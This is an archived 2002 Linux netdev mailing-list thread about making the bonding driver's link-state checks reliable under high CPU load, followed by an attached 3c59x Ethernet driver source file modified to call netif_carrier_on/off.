Chad From jgarzik@mandrakesoft.com Tue Sep 17 13:11:31 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:11:32 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HKBUtG023847 for ; Tue, 17 Sep 2002 13:11:30 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rOlm-0005FK-00; Tue, 17 Sep 2002 21:16:26 +0100 Message-ID: <3D878D79.20904@mandrakesoft.com> Date: Tue, 17 Sep 2002 16:15:53 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jay Vosburgh CC: "Cureington, Tony" , Andrew Morton , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPU load References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 226 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev Jay Vosburgh wrote: > > Well, now that it's been pointed out to me, that does look pretty > grotty. It works because MII_LINK_READY is defined to be 4, and the return > from bond_check_dev_link() is always a bitwise test against MII_LINK_READY, > so it works. Could be cleaner, though. Yep. Sounds like you also might want to replace a non-standard constant (MII_LINK_READY) with its standard constant from linux/mii.h, BMSR_LSTATUS, too, if you are going to use it like this. > As far as netif_carrier_ok() goes, is it reliable? In looking at the > drivers, it appears that some don't update the flag (e.g., 3c59x.c). No. Only some drivers implement it at present -- though all should. 
Patches to fix up drivers to use netif_carrier_{on,off} would be very welcome. There are several examples in-tree to emulate... Jeff From jgarzik@mandrakesoft.com Tue Sep 17 13:19:27 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:19:31 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HKJQtG024249 for ; Tue, 17 Sep 2002 13:19:26 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17rOtV-0005KH-00; Tue, 17 Sep 2002 21:24:25 +0100 Message-ID: <3D878F58.7060706@mandrakesoft.com> Date: Tue, 17 Sep 2002 16:23:52 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Chad N. Tindel" CC: Andrew Morton , "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 227 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev Chad N. Tindel wrote: >>>Will netif_carrier_ok(slave_dev) always work? Do all drivers support the >>>__LINK_STATE_NOCARRIER flag? >> >> >>No. Read again the precise language I used :) > > > Right, well thats what I thought. But how can we do what Andrew wants? You'll need execute those ioctls from process context -- or call dev->do_ioctl() yourself with proper locking. The latter would certainly be faster but you must be _very_ careful to avoid deadlocks. 
The former would certainly be preferred anyway, because calling an ioctl to check link state means you are hitting the slave_dev's phy, which is a very expensive operation in and of itself. Unfortunately I am thinking that locking in bonding.c may need a re-think if you want to do this sort of stuff :( Semaphores instead of a spinlocks may be appropriate, depending on the contexts in which link_state _really_ needs to be checked. Jeff From Andrew.Morton@digeo.com Tue Sep 17 13:19:19 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 13:19:31 -0700 (PDT) Received: from packet.digeo.com (packet.digeo.com [12.110.80.53]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HKJItG024238 for ; Tue, 17 Sep 2002 13:19:19 -0700 Received: from digeo-nav01.digeo.com (digeo-nav01.digeo.com [192.168.1.233]) by packet.digeo.com (8.9.3+Sun/8.9.3) with SMTP id NAA28641 for ; Tue, 17 Sep 2002 13:24:13 -0700 (PDT) Received: from schumi.digeo.com ([192.168.1.205]) by digeo-nav01.digeo.com (NAVGW 2.5.2.9) with SMTP id M2002091713281504201 ; Tue, 17 Sep 2002 13:28:15 -0700 Received: from pao-ex01.pao.digeo.com ([172.17.144.34]) by schumi.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 13:24:12 -0700 Received: from digeo.com ([172.17.140.150]) by pao-ex01.pao.digeo.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 17 Sep 2002 13:24:09 -0700 Message-ID: <3D878F69.AB2B0B6@digeo.com> Date: Tue, 17 Sep 2002 13:24:09 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.19-pre4 i686) X-Accept-Language: en MIME-Version: 1.0 To: Jeff Garzik CC: "Cureington, Tony" , Pascal Brisset , bonding-devel@lists.sourceforge.net, netdev@oss.sgi.com Subject: Re: [Bonding-devel] Re: Bonding driver unreliable under high CPUload References: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> <3D878675.3000403@mandrakesoft.com> <3D878841.EB580DE9@digeo.com> <3D878C56.2070400@mandrakesoft.com> Content-Type: multipart/mixed; 
boundary="------------E037F6CAA8E998053B25BA1E" X-OriginalArrivalTime: 17 Sep 2002 20:24:09.0701 (UTC) FILETIME=[2DD0B150:01C25E88] X-archive-position: 228 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@digeo.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------E037F6CAA8E998053B25BA1E Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Jeff Garzik wrote: > > Andrew Morton wrote: > > Jeff Garzik wrote: > > > >>... > >>Also, a further question: do you have access to the slave struct > >>net_device? If so, just test netif_carrier_ok(slave_dev) and avoid all > >>that ioctl calling if it returns non-zero. > > > > > > Make that "avoid all that ioctl calling from interrupt context", which > > is a bug. Of the box-killing variety ;) > > Indeed. /me looks at the bond_check_dev_link callers more closely and > shudders. > > That wants fixing... > > Note that netif_carrier_ok() can indeed be checked in interrupt context. > And if someone wants to send me patches converting more drivers to use > netif_carrier_{on,off}, I would be very happy :) That would be best. I'm so slack. I received the below two years ago; Nelson has added netif_carrier_foo support to 3c59x.c. As Jeff says: patches solicited. -------- Original Message -------- Subject: Re: netlink Date: Wed, 14 Jun 2000 11:19:33 +0800 (SST) From: Nelson To: Andrew Morton References: <394610FF.4052CEAA@uow.edu.au> hi Andrew, The modified 3c59x.c is attached. for your easy reference, these lines in the attached driver was modified: 69-72: notes on what are added 121-123: defined the time to expiry of the vertex_timer as TX_EXPIRE. i have set the value as 1*HZ. the original value should be 60*HZ. you may set to any value you feel is good ;p you r rite abt the 1 sec part since reading the MII management registers is time consuming. 
1122: used TX_EXPIRE instead 1335, 1399, 1428: set next_tick to TX_EXPIRE 1351: added calls to netif_carrier_on() 1356: added calls to netif_carrier_off() 1367-1371: added checking of link state do let me know if there are any discrepencies. thanx. --------------E037F6CAA8E998053B25BA1E Content-Type: text/plain; charset=us-ascii; name="3c59x.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="3c59x.c" /* EtherLinkXL.c: A 3Com EtherLink PCI III/XL ethernet driver for linux. */ /* Written 1996-1999 by Donald Becker. This software may be used and distributed according to the terms of the GNU Public License, incorporated herein by reference. This driver is for the 3Com "Vortex" and "Boomerang" series ethercards. Members of the series include Fast EtherLink 3c590/3c592/3c595/3c597 and the EtherLink XL 3c900 and 3c905 cards. The author may be reached as becker@CESDIS.gsfc.nasa.gov, or C/O Center of Excellence in Space Data and Information Sciences Code 930.5, Goddard Space Flight Center, Greenbelt MD 20771 Linux Kernel Additions: 0.99H+lk0.9 - David S. Miller - softnet, PCI DMA updates 0.99H+lk1.0 - Jeff Garzik Remove compatibility defines for kernel versions < 2.2.x. Update for new 2.3.x module interface LK1.1.2 (March 19, 2000) * New PCI interface (jgarzik) LK1.1.3 25 April 2000, Andrew Morton - Merged with 3c575_cb.c - Don't set RxComplete in boomerang interrupt enable reg - spinlock in vortex_timer to protect mdio functions - disable local interrupts around call to vortex_interrupt in vortex_tx_timeout() (So vortex_interrupt can use spin_lock()) - Select window 3 in vortex_timer()'s write to Wn3_MAC_Ctrl - In vortex_start_xmit(), move the lock to _after_ we've altered vp->cur_tx and vp->tx_full. This defeats the race between vortex_start_xmit() and vortex_interrupt which was identified by Bogdan Costescu. 
- Merged back support for six new cards from various sources - Set vortex_have_pci if pci_module_init returns zero (fixes cardbus insertion oops) - Tell it that 3c905C has NWAY for 100bT autoneg - Fix handling of SetStatusEnd in 'Too much work..' code, as per 2.3.99's 3c575_cb (Dave Hinds). - Split ISR into two for vortex & boomerang - Fix MOD_INC/DEC races - Handle resource allocation failures. - Fix 3CCFE575CT LED polarity - Make tx_interrupt_mitigation the default LK1.1.4 25 April 2000, Andrew Morton - Add extra TxReset to vortex_up() to fix 575_cb hotplug initialisation probs. - Put vortex_info_tbl into __devinitdata - In the vortex_error StatsFull HACK, disable stats in vp->intr_enable as well as in the hardware. - Increased the loop counter in wait_for_completion from 2,000 to 4,000. LK1.1.5 28 April 2000, andrewm - Added powerpc defines - Some extra diagnostics - In vortex_error(), reset the Tx on maxCollisions. Otherwise most chips usually get a Tx timeout. - Added extra_reset module parm - Replaced some inline timer manip with mod_timer (François Romieu) - In vortex_up(), don't make Wn3_config initialisation dependent upon has_nway (this came across from 3c575_cb). - See http://www.uow.edu.au/~andrewm/linux/#3c59x-2.3 for more details. 10 June 2000, Nelson Tan Gin Hwa - In vortex_timer(), make calls to netif_carrier_on() and netif_carrier_off() to set the __LINK_STATE_NOCARRIER bit to reflect the link state status. */ /* * FIXME: This driver _could_ support MTU changing, but doesn't. See Don's * hamaci.c implementation as well as other drivers * * NOTE: If you make 'vortex_debug' a constant (#define vortex_debug 0) the * driver shrinks by 2k due to dead code elimination. There will be some * performance benefits from this due to elimination of all the tests and * reduced cache footprint. */ /* "Knobs" that adjust features and parameters. */ /* Set the copy breakpoint for the copy-only-tiny-frames scheme. Setting to > 1512 effectively disables this feature.
*/ static const int rx_copybreak = 200; /* Allow setting MTU to a larger size, bypassing the normal ethernet setup. */ static const int mtu = 1500; /* Maximum events (Rx packets, etc.) to handle at each interrupt. */ static int max_interrupt_work = 32; /* Give the NIC an extra reset at the end of vortex_up() */ static int extra_reset = 0; /* Allow aggregation of Tx interrupts. Saves CPU load at the cost * of possible Tx stalls if the system is blocking interrupts * somewhere else. Undefine this to disable. * AKPM 26 April 2000: enabling this still gets vestigial Tx timeouts * in a heavily loaded (collision-prone) 10BaseT LAN. Should be OK with * switched Ethernet. */ #define tx_interrupt_mitigation 1 /* Put out somewhat more debugging messages. (0: no msg, 1 minimal .. 6). */ #define vortex_debug debug #ifdef VORTEX_DEBUG static int vortex_debug = VORTEX_DEBUG; #else static int vortex_debug = 1; #endif /* Some values here only for performance evaluation and path-coverage debugging. */ static int rx_nocopy = 0, rx_copy = 0, queued_packet = 0, rx_csumhits; /* A few values that may be tweaked. */ /* Time in jiffies before concluding the transmitter is hung. */ #define TX_TIMEOUT ((400*HZ)/1000) /* Time for the vortex_timer() function to be called again */ /* originally was 60*HZ */ #define TX_EXPIRE 1*HZ /* Keep the ring sizes a power of two for efficiency. */ #define TX_RING_SIZE 16 #define RX_RING_SIZE 32 #define PKT_BUF_SZ 1536 /* Size of each temporary Rx buffer.*/ #ifndef __OPTIMIZE__ #error You must compile this file with the correct options! #error See the last lines of the source file. #error You must compile this driver with "-O". #endif #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include /* For NR_IRQS only. */ #include #include /* John Daniel said these work... 
*/ #ifdef __powerpc__ #define outsl outsl_ns #define insl insl_ns #endif /* Kernel compatibility defines, some common to David Hinds' PCMCIA package. This is only in the support-all-kernels source code. */ #define RUN_AT(x) (jiffies + (x)) #include static char version[] __devinitdata = "3c59x.c:v0.99L+LK1.1.5 30 Apr 2000 Donald Becker and others http://cesdis.gsfc.nasa.gov/linux/drivers/vortex.html " "$Revision: 1.78 $\n"; MODULE_AUTHOR("Donald Becker "); MODULE_DESCRIPTION("3Com 3c59x/3c90x/3c575 series Vortex/Boomerang/Cyclone driver"); MODULE_PARM(debug, "i"); MODULE_PARM(options, "1-" __MODULE_STRING(8) "i"); MODULE_PARM(full_duplex, "1-" __MODULE_STRING(8) "i"); MODULE_PARM(rx_copybreak, "i"); MODULE_PARM(max_interrupt_work, "i"); MODULE_PARM(extra_reset, "i"); MODULE_PARM(compaq_ioaddr, "i"); MODULE_PARM(compaq_irq, "i"); MODULE_PARM(compaq_device_id, "i"); /* Operational parameters that usually are not changed. */ /* The Vortex size is twice that of the original EtherLinkIII series: the runtime register window, window 1, is now always mapped in. The Boomerang size is twice as large as the Vortex -- it has additional bus master control registers. */ #define VORTEX_TOTAL_SIZE 0x20 #define BOOMERANG_TOTAL_SIZE 0x40 /* Set iff a MII transceiver on any interface requires mdio preamble. This is only set with the original DP83840 on older 3c905 boards, so the extra code size of a per-interface flag is not worthwhile. */ static char mii_preamble_required = 0; #define PFX "3c59x: " /* Theory of Operation I. Board Compatibility This device driver is designed for the 3Com FastEtherLink and FastEtherLink XL, 3Com's PCI to 10/100baseT adapters. It also works with the 10Mbps versions of the FastEtherLink cards. The supported product IDs are 3c590, 3c592, 3c595, 3c597, 3c900, 3c905. The related ISA 3c515 is supported with a separate driver, 3c515.c, included with the kernel source or available from cesdis.gsfc.nasa.gov:/pub/linux/drivers/3c515.html II.
Board-specific settings PCI bus devices are configured by the system at boot time, so no jumpers need to be set on the board. The system BIOS should be set to assign the PCI INTA signal to an otherwise unused system IRQ line. The EEPROM settings for media type and forced-full-duplex are observed. The EEPROM media type should be left at the default "autoselect" unless using 10base2 or AUI connections which cannot be reliably detected. III. Driver operation The 3c59x series use an interface that's very similar to the previous 3c5x9 series. The primary interface is two programmed-I/O FIFOs, with an alternate single-contiguous-region bus-master transfer (see next). The 3c900 "Boomerang" series uses a full-bus-master interface with separate lists of transmit and receive descriptors, similar to the AMD LANCE/PCnet, DEC Tulip and Intel Speedo3. The first chip version retains a compatible programmed-I/O interface that has been removed in 'B' and subsequent board revisions. One extension that is advertised in a very large font is that the adapters are capable of being bus masters. On the Vortex chip this capability was only for a single contiguous region making it far less useful than the full bus master capability. There is a significant performance impact of taking an extra interrupt or polling for the completion of each transfer, as well as difficulty sharing the single transfer engine between the transmit and receive threads. Using DMA transfers is a win only with large blocks or with the flawed versions of the Intel Orion motherboard PCI controller. The Boomerang chip's full-bus-master interface is useful, and has the currently-unused advantages over other similar chips that queued transmit packets may be reordered and receive buffer groups are associated with a single frame. With full-bus-master support, this driver uses a "RX_COPYBREAK" scheme. Rather than a fixed intermediate receive buffer, this scheme allocates full-sized skbuffs as receive buffers. 
The value RX_COPYBREAK is used as the copying breakpoint: it is chosen to trade-off the memory wasted by passing the full-sized skbuff to the queue layer for all frames vs. the copying cost of copying a frame to a correctly-sized skbuff. IIIC. Synchronization The driver runs as two independent, single-threaded flows of control. One is the send-packet routine, which enforces single-threaded use by the dev->tbusy flag. The other thread is the interrupt handler, which is single threaded by the hardware and other software. IV. Notes Thanks to Cameron Spitzer and Terry Murphy of 3Com for providing development 3c590, 3c595, and 3c900 boards. The name "Vortex" is the internal 3Com project name for the PCI ASIC, and the EISA version is called "Demon". According to Terry these names come from rides at the local amusement park. The new chips support both ethernet (1.5K) and FDDI (4.5K) packet sizes! This driver only supports ethernet packets because of the skbuff allocation limit of 4K. */ /* This table drives the PCI probe routines. It's mostly boilerplate in all of the drivers, and will likely be provided by some future kernel. 
*/ enum pci_flags_bit { PCI_USES_IO=1, PCI_USES_MEM=2, PCI_USES_MASTER=4, PCI_ADDR0=0x10<<0, PCI_ADDR1=0x10<<1, PCI_ADDR2=0x10<<2, PCI_ADDR3=0x10<<3, }; enum { IS_VORTEX=1, IS_BOOMERANG=2, IS_CYCLONE=4, EEPROM_230=8, /* AKPM: Uses 0x230 as the base bitmaps for EEPROM reads */ HAS_PWR_CTRL=0x10, HAS_MII=0x20, HAS_NWAY=0x40, HAS_CB_FNS=0x80, }; enum vortex_chips { CH_3C590 = 0, CH_3C592, CH_3C597, CH_3C595_1, CH_3C595_2, CH_3C595_3, CH_VORTEX, CH_3C900_1, CH_3C900_2, CH_3C900_3, CH_3C900_4, CH_3C900_5, CH_3C900B_FL, CH_3C905_1, CH_3C905_2, CH_3C905B_1, CH_3C905B_2, CH_3C905B_FX, CH_3C905C, CH_3C980, CH_3CSOHO100_TX, CH_3C555, CH_3C575_1, CH_3CCFE575, CH_3CCFE575CT, CH_3CCFE656, CH_3CCFEM656, CH_3C450, }; /* note: this array is directly indexed by the above enums, and MUST * be kept in sync with both the enums above, and the PCI device * table below */ static struct vortex_chip_info { const char *name; int flags; int drv_flags; int io_size; } vortex_info_tbl[] __devinitdata = { {"3c590 Vortex 10Mbps", PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, {"3c592 EISA 10mbps Demon/Vortex", /* AKPM: from Don's 3c59x_cb.c 0.49H */ PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, {"3c597 EISA Fast Demon/Vortex", /* AKPM: from Don's 3c59x_cb.c 0.49H */ PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, {"3c595 Vortex 100baseTx", PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, {"3c595 Vortex 100baseT4", PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, {"3c595 Vortex 100base-MII", PCI_USES_IO|PCI_USES_MASTER, IS_VORTEX, 32, }, #define EISA_TBL_OFFSET 6 /* Offset of this entry for vortex_eisa_init */ {"3Com Vortex", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG, 64, }, {"3c900 Boomerang 10baseT", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG, 64, }, {"3c900 Boomerang 10Mbps Combo", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG, 64, }, {"3c900 Cyclone 10Mbps TPO", /* AKPM: from Don's 0.99M */ PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c900 Cyclone 10Mbps Combo", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE,
128, }, {"3c900 Cyclone 10Mbps TPC", /* AKPM: from Don's 0.99M */ PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c900B-FL Cyclone 10base-FL", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c905 Boomerang 100baseTx", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG|HAS_MII, 64, }, {"3c905 Boomerang 100baseT4", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG|HAS_MII, 64, }, {"3c905B Cyclone 100baseTx", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY, 128, }, {"3c905B Cyclone 10/100/BNC", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY, 128, }, {"3c905B-FX Cyclone 100baseFx", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c905C Tornado", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY, 128, }, {"3c980 Cyclone", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3cSOHO100-TX Hurricane", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c555 Laptop Hurricane", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE, 128, }, {"3c575 Boomerang CardBus", PCI_USES_IO|PCI_USES_MASTER, IS_BOOMERANG|HAS_MII|EEPROM_230, 64, }, {"3CCFE575 Cyclone CardBus", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY|HAS_CB_FNS|EEPROM_230, 128, }, {"3CCFE575CT Cyclone CardBus", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY|HAS_CB_FNS|EEPROM_230, 128, }, {"3CCFE656 Cyclone CardBus", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY|HAS_CB_FNS|EEPROM_230, 128, }, {"3CCFEM656 Cyclone CardBus", PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY|HAS_CB_FNS|EEPROM_230, 128, }, {"3c450 Cyclone/unknown", /* AKPM: from Don's 0.99N */ PCI_USES_IO|PCI_USES_MASTER, IS_CYCLONE|HAS_NWAY, 128, }, {0,}, /* 0 terminated list. 
*/ }; static struct pci_device_id vortex_pci_tbl[] __devinitdata = { { 0x10B7, 0x5900, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C590 }, { 0x10B7, 0x5920, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C592 }, { 0x10B7, 0x5970, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C597 }, { 0x10B7, 0x5950, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C595_1 }, { 0x10B7, 0x5951, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C595_2 }, { 0x10B7, 0x5952, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C595_3 }, { 0x10B7, 0x5900, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_VORTEX }, { 0x10B7, 0x9000, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900_1 }, { 0x10B7, 0x9001, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900_2 }, { 0x10B7, 0x9004, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900_3 }, { 0x10B7, 0x9005, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900_4 }, { 0x10B7, 0x9006, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900_5 }, { 0x10B7, 0x900A, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C900B_FL }, { 0x10B7, 0x9050, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905_1 }, { 0x10B7, 0x9051, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905_2 }, { 0x10B7, 0x9055, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905B_1 }, { 0x10B7, 0x9058, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905B_2 }, { 0x10B7, 0x905A, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905B_FX }, { 0x10B7, 0x9200, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C905C }, { 0x10B7, 0x9800, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C980 }, { 0x10B7, 0x7646, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3CSOHO100_TX }, { 0x10B7, 0x5055, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C555 }, { 0x10B7, 0x5057, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C575_1 }, { 0x10B7, 0x5157, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3CCFE575 }, { 0x10B7, 0x5257, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3CCFE575CT }, { 0x10B7, 0x6560, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3CCFE656 }, { 0x10B7, 0x6562, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3CCFEM656 }, { 0x10B7, 0x4500, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CH_3C450 }, {0,} /* 0 terminated list. */ }; MODULE_DEVICE_TABLE(pci, vortex_pci_tbl); /* Operational definitions. These are not used by other compilation units and thus are not exported in a ".h" file. 
First the windows. There are eight register windows, with the command and status registers available in each. */ #define EL3WINDOW(win_num) outw(SelectWindow + (win_num), ioaddr + EL3_CMD) #define EL3_CMD 0x0e #define EL3_STATUS 0x0e /* The top five bits written to EL3_CMD are a command, the lower 11 bits are the parameter, if applicable. Note that 11 parameter bits were fine for ethernet, but the new chip can handle FDDI-length frames (~4500 octets) and now parameters count 32-bit 'Dwords' rather than octets. */ enum vortex_cmd { TotalReset = 0<<11, SelectWindow = 1<<11, StartCoax = 2<<11, RxDisable = 3<<11, RxEnable = 4<<11, RxReset = 5<<11, UpStall = 6<<11, UpUnstall = (6<<11)+1, DownStall = (6<<11)+2, DownUnstall = (6<<11)+3, RxDiscard = 8<<11, TxEnable = 9<<11, TxDisable = 10<<11, TxReset = 11<<11, FakeIntr = 12<<11, AckIntr = 13<<11, SetIntrEnb = 14<<11, SetStatusEnb = 15<<11, SetRxFilter = 16<<11, SetRxThreshold = 17<<11, SetTxThreshold = 18<<11, SetTxStart = 19<<11, StartDMAUp = 20<<11, StartDMADown = (20<<11)+1, StatsEnable = 21<<11, StatsDisable = 22<<11, StopCoax = 23<<11, SetFilterBit = 25<<11,}; /* The SetRxFilter command accepts the following classes: */ enum RxFilter { RxStation = 1, RxMulticast = 2, RxBroadcast = 4, RxProm = 8 }; /* Bits in the general status register. */ enum vortex_status { IntLatch = 0x0001, HostError = 0x0002, TxComplete = 0x0004, TxAvailable = 0x0008, RxComplete = 0x0010, RxEarly = 0x0020, IntReq = 0x0040, StatsFull = 0x0080, DMADone = 1<<8, DownComplete = 1<<9, UpComplete = 1<<10, DMAInProgress = 1<<11, /* DMA controller is still busy.*/ CmdInProgress = 1<<12, /* EL3_CMD is still busy.*/ }; /* Register window 1 offsets, the window used in normal operation. On the Vortex this window is always mapped at offsets 0x10-0x1f. */ enum Window1 { TX_FIFO = 0x10, RX_FIFO = 0x10, RxErrors = 0x14, RxStatus = 0x18, Timer=0x1A, TxStatus = 0x1B, TxFree = 0x1C, /* Remaining free bytes in Tx buffer.
*/ }; enum Window0 { Wn0EepromCmd = 10, /* Window 0: EEPROM command register. */ Wn0EepromData = 12, /* Window 0: EEPROM results register. */ IntrStatus=0x0E, /* Valid in all windows. */ }; enum Win0_EEPROM_bits { EEPROM_Read = 0x80, EEPROM_WRITE = 0x40, EEPROM_ERASE = 0xC0, EEPROM_EWENB = 0x30, /* Enable erasing/writing for 10 msec. */ EEPROM_EWDIS = 0x00, /* Disable EWENB before 10 msec timeout. */ }; /* EEPROM locations. */ enum eeprom_offset { PhysAddr01=0, PhysAddr23=1, PhysAddr45=2, ModelID=3, EtherLink3ID=7, IFXcvrIO=8, IRQLine=9, NodeAddr01=10, NodeAddr23=11, NodeAddr45=12, DriverTune=13, Checksum=15}; enum Window2 { /* Window 2. */ Wn2_ResetOptions=12, }; enum Window3 { /* Window 3: MAC/config bits. */ Wn3_Config=0, Wn3_MAC_Ctrl=6, Wn3_Options=8, }; union wn3_config { int i; struct w3_config_fields { unsigned int ram_size:3, ram_width:1, ram_speed:2, rom_size:2; int pad8:8; unsigned int ram_split:2, pad18:2, xcvr:4, autoselect:1; int pad24:7; } u; }; enum Window4 { /* Window 4: Xcvr/media bits. */ Wn4_FIFODiag = 4, Wn4_NetDiag = 6, Wn4_PhysicalMgmt=8, Wn4_Media = 10, }; enum Win4_Media_bits { Media_SQE = 0x0008, /* Enable SQE error counting for AUI. */ Media_10TP = 0x00C0, /* Enable link beat and jabber for 10baseT. */ Media_Lnk = 0x0080, /* Enable just link beat for 100TX/100FX. */ Media_LnkBeat = 0x0800, }; enum Window7 { /* Window 7: Bus Master control. */ Wn7_MasterAddr = 0, Wn7_MasterLen = 6, Wn7_MasterStatus = 12, }; /* Boomerang bus master control registers. */ enum MasterCtrl { PktStatus = 0x20, DownListPtr = 0x24, FragAddr = 0x28, FragLen = 0x2c, TxFreeThreshold = 0x2f, UpPktStatus = 0x30, UpListPtr = 0x38, }; /* The Rx and Tx descriptor lists. Caution Alpha hackers: these types are 32 bits! Note also the 8 byte alignment constraint on tx_ring[] and rx_ring[]. */ #define LAST_FRAG 0x80000000 /* Last Addr/Len pair in descriptor. */ struct boom_rx_desc { u32 next; /* Last entry points to 0.
